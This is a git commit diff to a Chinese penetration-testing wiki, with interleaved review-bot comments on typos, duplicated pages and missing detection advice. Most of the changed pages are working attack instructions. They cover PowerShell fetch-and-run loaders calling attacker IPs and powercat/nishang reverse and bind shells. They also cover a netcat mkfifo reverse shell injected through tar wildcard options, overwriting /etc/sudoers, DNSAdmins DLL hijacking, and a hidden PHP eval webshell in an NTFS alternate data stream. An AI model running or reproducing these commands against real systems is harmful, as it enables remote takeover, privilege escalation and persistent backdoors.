Commit 34e5ebf

update active directory hacking
1 parent df1b5a7 commit 34e5ebf


44 files changed: +869 / -94 lines

wiki/README.md

+36-1
Original file line numberDiff line numberDiff line change
@@ -387,6 +387,10 @@
387387
- [攻击MSSQL数据库](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/攻击MSSQL数据库.md)
388388
- [攻击MySQL数据库](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/攻击MySQL数据库.md)
389389
- [账户委派](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/账户委派.md)
390+
- [kerberos约束委派](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/kerberos约束委派.md)
391+
- [kerberos无约束委派](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/kerberos无约束委派.md)
392+
- [kerberos青铜比特攻击CVE-2020-17049](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/kerberos青铜比特攻击CVE-2020-17049.md)
393+
- [基于kerberos资源的约束委派](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/基于kerberos资源的约束委派.md)
390394
- [CVE-2019-0708](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/CVE-2019-0708.md)
391395
- [获取保存的RDP密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/获取保存的RDP密码.md)
392396
- [GPP-Password](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/GPP-Password.md)
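Review bot: the new `基于kerberos资源的约束委派` entry on line 393 covers the same topic as the existing `资源受限委派` entry at line 416 (both are resource-based constrained delegation), so the index now points readers at two pages for one technique; either merge the two pages or turn one into a cross-reference to the other. Minor style point: the three new delegation entries spell `kerberos` in lowercase while the rest of the index capitalises protocol and product names (`CVE-2019-0708`, `GPP-Password`, `MSSQL`); use `Kerberos`.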
@@ -412,7 +416,38 @@
412416
- [资源受限委派](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/资源受限委派.md)
413417
- [WinRM无文件执行](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/WinRM无文件执行.md)
414418
- [组策略对象GPO](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/组策略对象GPO.md)
415-
419+
- [危险的内置组使用](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/危险的内置组使用.md)
420+
- [ActiveDirectory证书服务](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/README.md)
421+
- [查找证书服务器](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/查找证书服务器.md)
422+
- [ESC1-配置错误的证书模板](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC1-配置错误的证书模板.md)
423+
- [ESC2-配置错误的证书模板](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC2-配置错误的证书模板.md)
424+
- [ESC3-配置错误的注册代理模板](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC3-配置错误的注册代理模板.md)
425+
- [ESC4-访问控制漏洞](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC4-访问控制漏洞.md)
426+
- [ESC6-EDITF_ATTRIBUTESUBJECTALTNAME2](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC6-EDITF_ATTRIBUTESUBJECTALTNAME2.md)
427+
- [ESC7-易受攻击的证书颁发机构访问控制](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC7-易受攻击的证书颁发机构访问控制.md)
428+
- [ESC8-ADCS中继攻击](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC8-ADCS中继攻击.md)
429+
- [经过认证的CVE-2022-26923](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/经过认证的CVE-2022-26923.md)
430+
- [Pass-The-Certificate](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/Pass-The-Certificate.md)
431+
- [ActiveDirectory的ACL和ACE](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/README.md)
432+
- [GenericAll](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/GenericAll.md)
433+
- [GenericWrite](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/GenericWrite.md)
434+
- [WriteDACL](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/WriteDACL.md)
435+
- [WriteOwner](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/WriteOwner.md)
436+
- [读取GMSA密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/读取GMSA密码.md)
437+
- [读取LAPS密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/读取LAPS密码.md)
438+
- [强制更改密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/强制更改密码.md)
439+
- [DCOM-Exploitation](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/DCOM-Exploitation/README.md)
440+
- [DCOM](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/DCOM-Exploitation/DCOM.md)
441+
- [通过MMC应用程序类进行DCOM](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/DCOM-Exploitation/通过MMC应用程序类进行DCOM.md)
442+
- [通过Office进行DCOM](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/DCOM-Exploitation/通过Office进行DCOM.md)
443+
- [通过ShellExecute进行DCOM](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/DCOM-Exploitation/通过ShellExecute进行DCOM.md)
444+
- [通过ShellBrowserWindow进行DCOM](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/DCOM-Exploitation/通过ShellBrowserWindow进行DCOM.md)
445+
- [域与域](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/域与域.md)
446+
- [SCCM部署](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/SCCM部署.md)
447+
- [WSUS部署](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/WSUS部署.md)
448+
- [PrivExchange攻击](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/PrivExchange攻击.md)
449+
- [RODC-只读域控制器入侵](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/RODC-只读域控制器入侵.md)
450+
- [PXE启动映像攻击](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/PXE启动映像攻击.md)
416451
- [权限维持](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/README.md)
417452
- [Windows](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/README.md)
418453
- [Invoke-ADSBackdoor](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/Invoke-ADSBackdoor.md)
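Review bot: the ADCS sub-list jumps from `ESC4` to `ESC6` with no ESC5 page between them; if that omission is intentional, say so in `ActiveDirectory证书服务/README.md` so readers do not assume a page went missing. Also, `经过认证的CVE-2022-26923` reads as a word-for-word translation of the nickname "Certifried" under which that CVE is known; keep the nickname itself in the title so the page can be found by the name people search for.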

wiki/内网和域/命令与控制/Powershell.md

+36-36
@@ -1,70 +1,70 @@
11
#### MSF+Powershell
2-
反弹MSF
3-
靶机
2+
反弹MSF
3+
靶机
44
PS >IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.100/powersploit/CodeExecution/Invoke-Shellcode.ps1')
55
PS >Invoke-Shellcode -payload windows/meterpreter/reverse_http -lhost 192.168.0.100 -lport 6666 -force
6-
攻击机:
6+
攻击机:
77
>use exploit/multi/handler
88
>set payload windows/x64/meterpreter/reverse_ https
99
>run
10-
10+
1111
>msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.100 LPORT=4444 -f powershell -o /var/www/html/ps
1212
>IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.100/powersploit/CodeExecution/Invoke-Shellcode.ps1")
1313
>IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.100/ps")
1414
>Invoke-Shellcode -Shellcode ($buf)
15-
15+
1616
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=4444 -f psh-reflection >/var/www/html/a.ps1
1717
>powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.101/a.ps1')"
1818
#### Powercat
1919
>powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
20-
正向连接
21-
靶机:powercat -l -p 8080 -e cmd.exe –v
22-
攻击机:nc 192.168.0.1 8080 –vv
23-
反向连接:
24-
攻击机:nc –l –p 8080 –vv
25-
靶机:powercat –c 192.168.0.1 –p 8080 –v –e cmd.exe
26-
远程执行
20+
正向连接
21+
靶机:powercat -l -p 8080 -e cmd.exe –v
22+
攻击机:nc 192.168.0.1 8080 –vv
23+
反向连接:
24+
攻击机:nc –l –p 8080 –vv
25+
靶机:powercat –c 192.168.0.1 –p 8080 –v –e cmd.exe
26+
远程执行
2727
>powershell -nop -w hidden -ep bypass "IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.0.107/ps/powercat/powercat.ps1'); powercat -c 192.168.0.107 -p 12345 -v -e cmd.exe"
28-
正向连接
29-
靶机:powercat -l -p 8080 -e cmd.exe -v
30-
攻击机:nc 192.168.0.1 8080 -vv
31-
反向连接:
32-
攻击机:nc -l -p 8080 -vv
33-
靶机:powercat -c 192.168.0.1 -p 8080 -v -e cmd.exe
28+
正向连接
29+
靶机:powercat -l -p 8080 -e cmd.exe -v
30+
攻击机:nc 192.168.0.1 8080 -vv
31+
反向连接:
32+
攻击机:nc -l -p 8080 -vv
33+
靶机:powercat -c 192.168.0.1 -p 8080 -v -e cmd.exe
3434
![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/207.png)
3535
#### Nishang
3636
##### Bind shell
37-
靶机:
37+
靶机:
3838
>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Bind -Port 12138"
39-
攻击机:
40-
>nc 靶机IP 12138
41-
##### 反向shell
42-
攻击机:
39+
攻击机:
40+
>nc 靶机IP 12138
41+
##### 反向shell
42+
攻击机:
4343
>nc -vnlp 9999
44-
靶机:
45-
>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 攻击机IP -port 9999"
46-
##### UDP反向shell
47-
攻击机:
44+
靶机:
45+
>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 攻击机IP -port 9999"
46+
##### UDP反向shell
47+
攻击机:
4848
>nc -lvup 12138
49-
靶机:
50-
>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 攻击机IP -port 12138"
49+
靶机:
50+
>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 攻击机IP -port 12138"
5151
##### HTTPS
52-
攻击机:
53-
>powershell -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PoshRatHttps.ps1'); Invoke-PoshRatHttps -IPAddress 192.168.0.98 -Port 8080 -SSLPort 443" IP地址是本机IP
52+
攻击机:
53+
>powershell -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PoshRatHttps.ps1'); Invoke-PoshRatHttps -IPAddress 192.168.0.98 -Port 8080 -SSLPort 443" IP地址是本机IP
5454
![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/208.png)
5555

56-
靶机:
56+
靶机:
5757
>powershell -w hidden -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.98:8080/connect')
5858
![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/209.png)
5959
##### ICMP
60-
攻击机IP:108
61-
靶机IP:100
60+
攻击机IP:108
61+
靶机IP:100
6262
https://github.com/inquisb/icmpsh
63-
靶机执行
63+
靶机执行
6464
>powershell -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.108/ps/nishang/Shells/Invoke-PowerShellIcmp.ps1');Invoke-PowerShellIcmp 192.168.0.108
6565
![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/210.png)
6666

67-
攻击机执行,开启相应ICMP ECHO请求
67+
攻击机执行,开启相应ICMP ECHO请求
6868
>sysctl -w net.ipv4.icmp_echo_ignore_all=1
6969
>./icmpsh_m.py 192.168.0.108 192.168.0.100
7070
![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/211.png)
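Review bot: every `-`/`+` pair in this hunk is textually identical, so the 36-line rewrite of this file is a whitespace or line-ending-only change; the commit message (`update active directory hacking`) does not mention it, and a `text=auto` rule in `.gitattributes` would stop this churn recurring. Since the hunk rewrites lines 20-25 anyway, note that they duplicate lines 28-33, the only difference being en-dash characters (`–v`, `–vv`, `–c`, `–p`) that a shell will not parse as options; keeping only the second copy would be cleaner. Two context lines are also broken as written: line 8's payload name contains a stray space (`reverse_ https`), and lines 57 and 64 open a double-quoted string that is never closed. Finally, line 67 says the attacker "enables" (开启) ICMP echo handling, but `icmp_echo_ignore_all=1` on line 68 tells the kernel to stop answering echo requests so that `icmpsh_m.py` on line 69 receives them instead, which is the opposite of what the sentence says; reword it.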

wiki/权限提升/Linux提权/Lxd提权.md

+4-4
@@ -1,11 +1,11 @@
1-
查看文件是否存在
1+
查看文件是否存在
22
>which lxd & >which lxc
3-
攻击机
3+
攻击机
44
>git clone https://github.com/saghul/lxd-alpine-builder.git
55
>cd lxd-alpine-builder
66
>./build-alpine
7-
搞个web服务提供下载>python -m SimpleHTTPServer
8-
靶机下载
7+
搞个web服务提供下载>python -m SimpleHTTPServer
8+
靶机下载
99
>wget http://192.168.1.107:8000/apline-v3.10-x86_64-20191008_1227.tar.gz
1010
>lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
1111
>lxc image list
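Review bot: line 9 downloads `apline-v3.10-x86_64-20191008_1227.tar.gz` while line 10 imports `./alpine-v3.10-x86_64-20191008_1227.tar.gz`; one of the two filenames is misspelled, so the sequence cannot be followed as written. Line 2, `>which lxd & >which lxc`, also has the page's `>` prompt marker embedded in the middle of the command and backgrounds the first check with a single `&`; `which lxd lxc` is what is meant. The `-`/`+` pairs in this hunk are textually identical (whitespace-only change), and `python -m SimpleHTTPServer` on line 7 is Python 2 only; `python3 -m http.server` is the current equivalent.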

wiki/权限提升/Linux提权/环境变量提权.md

+22-22
@@ -1,5 +1,5 @@
1-
##### 第一种
2-
假设存在一个脚本代码为
1+
##### 第一种
2+
假设存在一个脚本代码为
33
```c
44
#include<unistd.h>
55
void main()
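Review bot: the `-`/`+` pairs throughout this file are textually identical, so all seven hunks are whitespace or line-ending changes only; that is worth stating in the commit message, or better, normalising line endings once via `.gitattributes` so the real content changes in this commit are not buried. In the sample program, `void main()` is non-standard C; `int main(void)` returning 0 compiles cleanly with `-Wall` and behaves identically for the demonstration.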
@@ -10,13 +10,13 @@
1010
}
1111
```
1212
13-
编译
13+
编译
1414
>gcc demo.c -o shell
1515
>chmod u+s shell
16-
执行./shell 回显ps命令
17-
提权
16+
执行./shell 回显ps命令
17+
提权
1818
find / -perm -u=s -type f 2>/dev/null
19-
存在脚本/home/name/script/shell
19+
存在脚本/home/name/script/shell
2020
>cd /tmp
2121
>echo "/bin/bash" > ps
2222
>chmod 777 ps
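Review bot: line 19 says the SUID binary lives at `/home/name/script/shell`, but line 25 changes into `/home/raj/script` before running `./shell`; the same `name`/`raj` mismatch recurs for `shell2` (lines 57 and 63), `shell3` (lines 80 and 88) and `shell4` (line 105). Pick one path and use it throughout. Also, line 18's `find / -perm -u=s -type f 2>/dev/null` lacks the `>` prompt prefix that every other command in this file carries.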
@@ -25,20 +25,20 @@
2525
>cd /home/raj/script
2626
>./shell
2727
>whoami
28-
或使用copy命令
28+
或使用copy命令
2929
>cd /home/raj/script/
3030
>cp /bin/sh /tmp/ps
3131
>echo $PATH
3232
>export PATH=/tmp:$PATH
3333
>./shell
3434
>whoami
35-
或使用ln命令
35+
或使用ln命令
3636
>ln -s /bin/sh ps
3737
>export PATH=.:$PATH
3838
>./shell
3939
>id
40-
##### 第二种
41-
假设存在一个脚本代码为
40+
##### 第二种
41+
假设存在一个脚本代码为
4242
```c
4343
#include<unistd.h>
4444
void main()
@@ -49,12 +49,12 @@
4949
}
5050
```
5151

52-
编译
52+
编译
5353
>gcc test.c -o shell2
5454
>chmod u+s shell2
55-
提权
55+
提权
5656
find / -perm -u=s -type f 2>/dev/null
57-
存在脚本/home/name/script/shell2
57+
存在脚本/home/name/script/shell2
5858
>cd /tmp
5959
>echo "/bin/bash" > id
6060
>chmod 777 id
@@ -63,8 +63,8 @@
6363
>cd /home/raj/script
6464
>./shell2
6565
>whoami
66-
##### 第三种
67-
假设存在一个脚本代码为
66+
##### 第三种
67+
假设存在一个脚本代码为
6868
```c
6969
#include<unistd.h>
7070
void main()
@@ -75,21 +75,21 @@
7575
}
7676
```
7777
78-
编译后提权
78+
编译后提权
7979
find / -perm -u=s -type f 2>/dev/null
80-
存在脚本/home/name/script/shell3
80+
存在脚本/home/name/script/shell3
8181
>cd /tmp
8282
>vi cat
83-
内容为/bin/bash
83+
内容为/bin/bash
8484
>chmod 777 cat
8585
>ls -al cat
8686
>echo $PATH
8787
>export PATH=/tmp:$PATH
8888
>cd /home/raj/script
8989
>./shell3
9090
>whoami
91-
##### 第四种
92-
假设存在一个脚本代码为
91+
##### 第四种
92+
假设存在一个脚本代码为
9393
```c
9494
#include<unistd.h>
9595
void main()
@@ -100,9 +100,9 @@
100100
}
101101
```
102102

103-
编译后提权
103+
编译后提权
104104
find / -perm -u=s -type f 2>/dev/null
105-
存在脚本/home/name/script/shell4
105+
存在脚本/home/name/script/shell4
106106
>cd /tmp
107107
>vi cat
108108
>chmod 777 cat

wiki/权限提升/Linux提权/通配符提权.md

+9-9
@@ -1,23 +1,23 @@
1-
低权限登录
2-
查看cron
1+
低权限登录
2+
查看cron
33
>cat /etc/crontab
4-
存在一个定时压缩目录的任务
5-
生成反向shell
4+
存在一个定时压缩目录的任务
5+
生成反向shell
66
>msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.102 lport=8888 R
7-
再监听
7+
再监听
88
>nc -lvp 8888
9-
靶机执行
9+
靶机执行
1010
>echo "mkfifo /tmp/lhennp; nc 192.168.1.102 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
1111
>echo "" > "--checkpoint-action=exec=sh shell.sh"
1212
>echo "" > --checkpoint=1
1313
>tar cf archive.tar *
14-
即可返回shell
15-
或使用sudoer
14+
即可返回shell
15+
或使用sudoer
1616
>echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > demo.sh
1717
>echo "" > "--checkpoint-action=exec=sh demo.sh"
1818
>echo "" > --checkpoint=1
1919
>tar cf archive.tar *
20-
或suid
20+
或suid
2121
>echo "chmod u+s /usr/bin/find" > test.sh
2222
>echo "" > "--checkpoint-action=exec=sh test.sh"
2323
>echo "" > --checkpoint=1
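Review bot: this page shows three payloads against the `tar cf archive.tar *` cron job but never states the root cause or the fix; a closing line explaining that the unquoted wildcard lets filenames be consumed as `--checkpoint-action` options, and that the cron entry should pass `--` before the glob or name an explicit directory instead of `*`, would make the page useful on the hardening side as well. Line 16's `> /etc/sudoers` also replaces the entire sudoers file rather than adding a rule, a destructive side effect the text should at least call out. As elsewhere in this commit, the `-`/`+` pairs are identical, so the hunk itself is whitespace-only.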
@@ -1,11 +1,18 @@
1-
>whoami /groups 可以看到当前用户是DnsAdmins组
2-
>msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f dll -o 1.dll
3-
使用impacket中的smbserver.py托管root目录
4-
>smbserver.py -smb2support raj /root
5-
靶机通过dnscmd.exe将DLL传递到内存
6-
>dnscmd.exe /config /serverlevelplugindll \\192.168.0.1\raj\1.dll
7-
攻击机监听
8-
>nc -lvp 11111
9-
靶机重启dns
10-
>sc stop dns
11-
>sc start dns
1+
DNSAdmins 组的成员可以加载具有 dns.exe (SYSTEM) 权限的任意 DLL。
2+
需要权限才能重新启动 DNS 服务。
3+
枚举 DNSAdmins 组的成员
4+
>Get-NetGroupMember -GroupName "DNSAdmins"
5+
>Get-ADGroupMember -Identity DNSAdmins
6+
更改 DNS 服务加载的 dll
7+
使用RSAT
8+
>dnscmd <servername> /config /serverlevelplugindll \\attacker_IP\dll\mimilib.dll
9+
>dnscmd 10.10.10.11 /config /serverlevelplugindll \\10.10.10.10\exploit\privesc.dll
10+
使用DNSServer模块
11+
$dnsettings = Get-DnsServerSetting -ComputerName <servername> -Verbose -All
12+
$dnsettings.ServerLevelPluginDll = "\attacker_IP\dll\mimilib.dll"
13+
Set-DnsServerSetting -InputObject $dnsettings -ComputerName <servername> -Verbose
14+
检查上一条命令是否成功
15+
>Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
16+
重新启动 DNS
17+
>sc \\dc01 stop dns
18+
>sc \\dc01 start dns
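Review bot: line 12 assigns `"\attacker_IP\dll\mimilib.dll"` with a single leading backslash, while line 8 uses the UNC form `\\attacker_IP\dll\mimilib.dll`; the single-backslash version is not a UNC path, so the setting would point at a non-existent local path. Line 2 ("需要权限才能重新启动 DNS 服务") should name which right is meant, since lines 17-18 stop and start the service remotely on `\\dc01`. From the defensive side, the registry check on line 15 is also the value worth auditing and alerting on: `ServerLevelPluginDll` under `HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters` is normally absent, and a change to it followed by a DNS service restart is the indicator of this technique; a short detection and mitigation paragraph (that value, plus membership of the `DNSAdmins` group enumerated on lines 4-5) would round the page out.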
+10-10
@@ -1,21 +1,21 @@
1-
指定宿主文件,index.php是网页正常文件
1+
指定宿主文件,index.php是网页正常文件
22
>echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg
3-
<?php include(‘index.php:hidden.jpg’)?>
3+
<?php include(‘index.php:hidden.jpg’)?>
44
<?php
5-
$a="696E6465782E7068703"."A68696464656E2E6A7067";#hex编码
5+
$a="696E6465782E7068703"."A68696464656E2E6A7067";#hex编码
66
$b="a";
77
include(PACK('H*',$$b))
88
?>
99
>echo 9527 > 1.txt:flag.txt
1010
>notepad 1.txt:flag.txt
11-
或不指定宿主文件
11+
或不指定宿主文件
1212
>echo hide > :key.txt
1313
>cd ../
1414
>notepad test:key.txt
15-
上传处绕过
16-
|上传的文件名 |服务器表面现象 |生成的文件内容 |
15+
上传处绕过
16+
|上传的文件名 |服务器表面现象 |生成的文件内容 |
1717
| ------------ | ------------ | ------------ |
18-
|test.php:a.jpg |生成test.php ||
19-
|test.php::$DATA | 生成test.php |<?php phpinfo();?> |
20-
|test.php::$INDEX_ALLOCATION |生成test.php文件夹 |\ |
21-
|test.php::$DATA\0.jpg |生成0.jpg |<?php phpinfo();?> |
18+
|test.php:a.jpg |生成test.php ||
19+
|test.php::$DATA | 生成test.php |<?php phpinfo();?> |
20+
|test.php::$INDEX_ALLOCATION |生成test.php文件夹 |\ |
21+
|test.php::$DATA\0.jpg |生成0.jpg |<?php phpinfo();?> |
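Review bot: line 3's `include(‘index.php:hidden.jpg’)` uses typographic quotes, which PHP does not accept as string delimiters, so that snippet is a parse error as written; the hex-encoded form on lines 4-8 is the one that actually works. The `-`/`+` pairs are again identical, so this hunk is whitespace-only. The table under 上传处绕过 would also benefit from a sentence stating that every row relies on NTFS alternate data stream syntax in the uploaded filename, which is the point of the page but is never said explicitly.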
